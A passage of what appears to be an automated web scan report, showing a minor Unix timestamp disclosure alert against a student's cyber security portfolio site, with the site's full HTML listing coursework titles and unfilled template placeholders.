          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          257747436
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        21. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          350400823, which evaluates to: 1981-02-07 14:33:43

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
